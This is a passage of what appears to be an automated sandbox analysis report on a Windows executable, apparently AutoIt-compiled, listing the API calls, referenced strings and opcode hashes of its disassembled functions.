                                                                APIs
                                                                • SysReAllocString.OLEAUT32(?,?), ref: 00776EED
                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 00776F08
                                                                • VariantClear.OLEAUT32(?), ref: 00776F12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$AllocClearCopyString
                                                                • String ID: *jw
                                                                • API String ID: 2173805711-2615704982
                                                                • Opcode ID: bc73a657917de3d09f5e5bea73c97e0a082f87b43bf965aad1fd5ae8a6fc7e6b
                                                                • Instruction ID: 9353b39d648c6cb00b96d8038f9c756c1c6b70e4a807ee4f907edc55e2f72912
                                                                • Opcode Fuzzy Hash: bc73a657917de3d09f5e5bea73c97e0a082f87b43bf965aad1fd5ae8a6fc7e6b
                                                                • Instruction Fuzzy Hash: 52310231604646DFCF05AFA8E8548BD37B6FF85740B1084A8F8065B2A1C73C9D52CBD4
                                                                APIs
                                                                  • Part of subcall function 0079335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00793077,?,?), ref: 00793378
                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
                                                                • _wcslen.LIBCMT ref: 0079309B
                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00793106
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                • String ID: 255.255.255.255
                                                                • API String ID: 946324512-2422070025
                                                                • Opcode ID: b3dd11f961a9e1d15629d93a7b5df6ff9b45a00f7f9a8c32c697a1402ac1ed33
                                                                • Instruction ID: bb791d58aa421d601845515162aba5e74372324a1167ca8b0d5217aefe2b7860
                                                                • Opcode Fuzzy Hash: b3dd11f961a9e1d15629d93a7b5df6ff9b45a00f7f9a8c32c697a1402ac1ed33
                                                                • Instruction Fuzzy Hash: E031C139200205DFDF20CF6CD485EAA77E1EF55318F248059E9158B3A2DB3AEE45C760
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007A4705
                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007A4713
                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007A471A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DestroyWindow
                                                                • String ID: msctls_updown32
                                                                • API String ID: 4014797782-2298589950
                                                                • Opcode ID: 3c76bd6ae7b1db2a11920360a4ac4df382e46a194a8cf3224dc7926a51261daa
                                                                • Instruction ID: b7d2906d0d5e513b5d04e727497ccc2fb3d12f422bc42597d08dd2cc706a5bdf
                                                                • Opcode Fuzzy Hash: 3c76bd6ae7b1db2a11920360a4ac4df382e46a194a8cf3224dc7926a51261daa
                                                                • Instruction Fuzzy Hash: 7C218EB5601248AFDB11DF68DCC5DBB37ADEB8B394B040159FA009B2A1DB79EC11CA60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                • API String ID: 176396367-2734436370
                                                                • Opcode ID: 8eebd64a0398c79491ae761b6ae5e42bbd650d2f1f9984c4611b27852f2f15c4
                                                                • Instruction ID: 6966fdb1e75230f2e2e7bd959d43cbe6a4b173bdeafac0ca29037489b0d1b008
                                                                • Opcode Fuzzy Hash: 8eebd64a0398c79491ae761b6ae5e42bbd650d2f1f9984c4611b27852f2f15c4
                                                                • Instruction Fuzzy Hash: 44218E72205221A6DB31BB289C06FB773E89F91340F00C125FA4DD70C1EB6CAD51C2A2
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007A3840
                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007A3850
                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007A3876
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$MoveWindow
                                                                • String ID: Listbox
                                                                • API String ID: 3315199576-2633736733
                                                                • Opcode ID: 9b52db193cd7c6c540c6c49aeafc5c2d12814f6a9a48e01899099dccab0a5a4f
                                                                • Instruction ID: c7b738c0517dcde02b8fb7d1c93edcd13d1bd1b6b90fb76676e43006c476e999
                                                                • Opcode Fuzzy Hash: 9b52db193cd7c6c540c6c49aeafc5c2d12814f6a9a48e01899099dccab0a5a4f
                                                                • Instruction Fuzzy Hash: 7A219272610118BBEF119F54CC85FBB376EEFCA760F108225F9049B190CA79DC518BA0
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 00784A08
                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00784A5C
                                                                • SetErrorMode.KERNEL32(00000000,?,?,007ACC08), ref: 00784AD0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$InformationVolume
                                                                • String ID: %lu
                                                                • API String ID: 2507767853-685833217
                                                                • Opcode ID: 7580c8df02931548c1ebcb008e54089aa4b2074ed06a6489026ce76f5fb22e48
                                                                • Instruction ID: 2cf1e1071e9ceaee18450825b7ce8f0c4384a46a3d3c442106315d4aca06d1c5
                                                                • Opcode Fuzzy Hash: 7580c8df02931548c1ebcb008e54089aa4b2074ed06a6489026ce76f5fb22e48
                                                                • Instruction Fuzzy Hash: 84318071A00109EFDB10DF64C885EAA7BF8EF49304F1480A5E909DB352D779EE45CBA1
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007A424F
                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007A4264
                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007A4271
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: msctls_trackbar32
                                                                • API String ID: 3850602802-1010561917
                                                                • Opcode ID: 0af5ebfb6504c6ffae02595068ac5c49ee1c2e5a969de4cd20c041814b00dab6
                                                                • Instruction ID: cda1c2b61fd809b9c7486efab032f7316ad37d09b26149167efd2173357fb50b
                                                                • Opcode Fuzzy Hash: 0af5ebfb6504c6ffae02595068ac5c49ee1c2e5a969de4cd20c041814b00dab6
                                                                • Instruction Fuzzy Hash: 3711E331240248BEEF209F28CC46FAB3BACEFC6B64F010224FA55E60D0D6B6DC519B50
                                                                APIs
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                  • Part of subcall function 00772DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00772DC5
                                                                  • Part of subcall function 00772DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00772DD6
                                                                  • Part of subcall function 00772DA7: GetCurrentThreadId.KERNEL32 ref: 00772DDD
                                                                  • Part of subcall function 00772DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00772DE4
                                                                • GetFocus.USER32 ref: 00772F78
                                                                  • Part of subcall function 00772DEE: GetParent.USER32(00000000), ref: 00772DF9
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00772FC3
                                                                • EnumChildWindows.USER32(?,0077303B), ref: 00772FEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                • String ID: %s%d
                                                                • API String ID: 1272988791-1110647743
                                                                • Opcode ID: 9ebd0e65082ad258e10f4ce4130aa19a9e80299a1fe7324aa658ac97e89b7ec5
                                                                • Instruction ID: f02ec294058f1f38194d3b084fe81b8a1fa81705e747e12ca59d31a238df716b
                                                                • Opcode Fuzzy Hash: 9ebd0e65082ad258e10f4ce4130aa19a9e80299a1fe7324aa658ac97e89b7ec5
                                                                • Instruction Fuzzy Hash: EE11C0B1700205ABCF55AF748C89EED376AAF84344F048075B90D9B292DE389946DB60
                                                                APIs
                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007A58C1
                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007A58EE
                                                                • DrawMenuBar.USER32(?), ref: 007A58FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$InfoItem$Draw
                                                                • String ID: 0
                                                                • API String ID: 3227129158-4108050209
                                                                • Opcode ID: 733ed4e6c92cd1fb1d92913a58546f77062092fc5f9a36272f90d4a74a3173af
                                                                • Instruction ID: b43f26ae942a84c06d9ed399d1c68996218107ec926403f1a6ebce1848a24ec7
                                                                • Opcode Fuzzy Hash: 733ed4e6c92cd1fb1d92913a58546f77062092fc5f9a36272f90d4a74a3173af
                                                                • Instruction Fuzzy Hash: 99014431900218EFDB129F11EC44BAFBBB4FF86361F1481A9F849DA151DB389A94DF21
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9131d43242ec15843ad5f45515ecbd81dfb01368c007d4829049b87c53bfd0a2
                                                                • Instruction ID: 680d0f7f0b95b71db0649cdabc67f279abb0c8bc59101be49d706543f4e9c7e9
                                                                • Opcode Fuzzy Hash: 9131d43242ec15843ad5f45515ecbd81dfb01368c007d4829049b87c53bfd0a2
                                                                • Instruction Fuzzy Hash: 8DC16C75A0020AEFDB14CFA4C898EAEB7B5FF48354F208598E509EB251D735ED41DB90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                • String ID:
                                                                • API String ID: 1998397398-0
                                                                • Opcode ID: fa29cbd7a4b7e59fcaf4ae133ec46e1059f41bfb37d60f4718a35a19f84cd2fa
                                                                • Instruction ID: ef903cef02cfdb4cbe792d853964af5b248a9e606601f98a7a83fce1119c4696
                                                                • Opcode Fuzzy Hash: fa29cbd7a4b7e59fcaf4ae133ec46e1059f41bfb37d60f4718a35a19f84cd2fa
                                                                • Instruction Fuzzy Hash: 16A14B75204200DFCB14DF68D489A6AB7E5FF8C714F058859F98A9B3A2DB38ED41CB91
                                                                APIs
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007AFC08,?), ref: 007705F0
                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007AFC08,?), ref: 00770608
                                                                • CLSIDFromProgID.OLE32(?,?,00000000,007ACC40,000000FF,?,00000000,00000800,00000000,?,007AFC08,?), ref: 0077062D
                                                                • _memcmp.LIBVCRUNTIME ref: 0077064E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FromProg$FreeTask_memcmp
                                                                • String ID:
                                                                • API String ID: 314563124-0
                                                                • Opcode ID: 3a204f9d604fae1e357c916efc40f19b4a13ce603aa676a07c6ec340e3d7600b
                                                                • Instruction ID: a650563f9ec91edc1a4ca41e0cd362376e373c8add486a579514354c8e86298b
                                                                • Opcode Fuzzy Hash: 3a204f9d604fae1e357c916efc40f19b4a13ce603aa676a07c6ec340e3d7600b
                                                                • Instruction Fuzzy Hash: 2C81F971A00109EFCF04DF94C988DEEB7B9FF89355B208558E506AB250DB75AE46CBA0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: c8371bfda78ec510951f3e52178d544537f9808201c68fd0a6ab7e5f175e7337
                                                                • Instruction ID: 4601103d830c9f6ffe4c2a264c590a4605d009bf7ebc0a9833f63e991a09344d
                                                                • Opcode Fuzzy Hash: c8371bfda78ec510951f3e52178d544537f9808201c68fd0a6ab7e5f175e7337
                                                                • Instruction Fuzzy Hash: 62411932A00140EBEB216BBD9C49BEF3AA4EF41373F544225FC19D6192E7BC4C455661
                                                                APIs
                                                                • GetWindowRect.USER32(012FE7F8,?), ref: 007A62E2
                                                                • ScreenToClient.USER32(?,?), ref: 007A6315
                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 007A6382
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientMoveRectScreen
                                                                • String ID:
                                                                • API String ID: 3880355969-0
                                                                • Opcode ID: 1990292e2e5484b8a5cd53365201baba46e0165392aa680a69fd7fdd44bb544f
                                                                • Instruction ID: 4efc3d8766e671c9d28c09bd4894cc893af8fa824a035af67feaa425aa908cc0
                                                                • Opcode Fuzzy Hash: 1990292e2e5484b8a5cd53365201baba46e0165392aa680a69fd7fdd44bb544f
                                                                • Instruction Fuzzy Hash: BA515E75A00249EFCF10DF68D881AAE7BB5FF86360F148269F9159B290D738ED81CB50
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00791AFD
                                                                • WSAGetLastError.WSOCK32 ref: 00791B0B
                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00791B8A
                                                                • WSAGetLastError.WSOCK32 ref: 00791B94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$socket
                                                                • String ID:
                                                                • API String ID: 1881357543-0
                                                                • Opcode ID: 78b70921772a9e7e2707af4e3a7ca833293cc3b18a167f68ceda00b7d794ea14
                                                                • Instruction ID: 1b7e1cf504daa74eb1ed0183a66106693f091b1087c9bbef8ef46b45fc3a64fb
                                                                • Opcode Fuzzy Hash: 78b70921772a9e7e2707af4e3a7ca833293cc3b18a167f68ceda00b7d794ea14
                                                                • Instruction Fuzzy Hash: 9041E574640200AFDB20AF24D88AF6577E5AB45718F54C448F5159F3D3D77AED82CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61cac57aa9287b8374a46b73fc1356cae6cb878f8e4470574e93781097825df
                                                                • Instruction ID: 1d3e6dad07d3bd57f1bf9b48819d2b219963d40529dedb8215219bb202d63f3d
                                                                • Opcode Fuzzy Hash: c61cac57aa9287b8374a46b73fc1356cae6cb878f8e4470574e93781097825df
                                                                • Instruction Fuzzy Hash: 11412872A00344FFD7259F3CCC49BAABBA9EB88710F10452AF555DB282D779ED118780
                                                                APIs
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00785783
                                                                • GetLastError.KERNEL32(?,00000000), ref: 007857A9
                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007857CE
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007857FA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                • String ID:
                                                                • API String ID: 3321077145-0
                                                                • Opcode ID: 5cd7e7d8f1ccf8de81665dcd7f44703fa1d4493f1b672674e2b1789c73a33587
                                                                • Instruction ID: aedc73a5447bb7f83f07bf479572ed346029bf79406350a10ed640fbdfa898ce
                                                                • Opcode Fuzzy Hash: 5cd7e7d8f1ccf8de81665dcd7f44703fa1d4493f1b672674e2b1789c73a33587
                                                                • Instruction Fuzzy Hash: 7E411E35600610DFCB15EF59C549A5DBBF2EF89720B19C488E84A5B3A2CB38FD41CB91
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00736D71,00000000,00000000,007382D9,?,007382D9,?,00000001,00736D71,?,00000001,007382D9,007382D9), ref: 0074D910
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074D999
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0074D9AB
                                                                • __freea.LIBCMT ref: 0074D9B4
                                                                  • Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
